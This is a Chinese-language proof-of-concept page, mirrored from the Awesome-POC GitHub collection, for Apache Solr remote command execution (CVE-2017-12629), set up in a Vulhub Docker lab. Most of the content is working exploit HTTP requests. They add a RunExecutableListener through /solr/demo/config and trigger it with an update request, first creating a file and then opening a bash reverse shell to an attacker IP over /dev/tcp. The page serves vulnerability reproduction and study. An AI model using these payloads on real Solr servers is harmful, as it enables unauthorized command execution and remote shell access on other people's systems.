admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/中间件漏洞/Apache Solr 远程命令执行漏洞 CVE-2017-12629.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

96 lines
2.9 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Apache Solr 远程命令执行漏洞 CVE-2017-12629
## 漏洞描述
漏洞原理与分析可以参考:
- https://www.exploit-db.com/exploits/43009/
- https://paper.seebug.org/425/
Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:[XML实体扩展漏洞XXE](https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE)和远程命令执行漏洞RCE二者可以连接成利用链编号均为CVE-2017-12629。
本环境测试RCE漏洞。
## 环境搭建
Vulhub运行漏洞环境
```
docker-compose up -d
```
命令执行成功后,需要等待一会,之后访问`http://your-ip:8983/`即可查看到Apache solr的管理页面无需登录。
![image-20220301111215342](images/202203011112418.png)
## 漏洞复现
首先创建一个listener其中设置exe的值为我们想执行的命令args的值是命令参数
```
POST /solr/demo/config HTTP/1.1
Host: your-ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 158
{"add-listener":{"event":"postCommit","name":"new_listener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/awesome_poc"]}}
```
![image-20220301111449684](images/202203011114799.png)
然后进行update操作触发刚才添加的listener
```
POST /solr/demo/update HTTP/1.1
Host: your-ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 15
[{"id":"test"}]
```
![image-20220301111552786](images/202203011115847.png)
执行`docker-compose exec solr bash`进入容器,可见`/tmp/awesome_poc`已成功创建:
![image-20220301111641749](images/202203011116817.png)
执行反弹shell命令
```
POST /solr/demo/config HTTP/1.1
Host: your-vps-ip:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 192
{"add-listener":{"event":"postCommit","name":"newlistener_bash","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "bash -i >& /dev/tcp/192.168.174.128/9999 0>&1"]}}
```
然后进行update操作触发刚才添加的listener
```
POST /solr/demo/update HTTP/1.1
Host: your-ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 15
[{"id":"test"}]
```
成功接收反弹shell
![image-20220301112041937](images/202203011120015.png)
Reference in New Issue View Git Blame Copy Permalink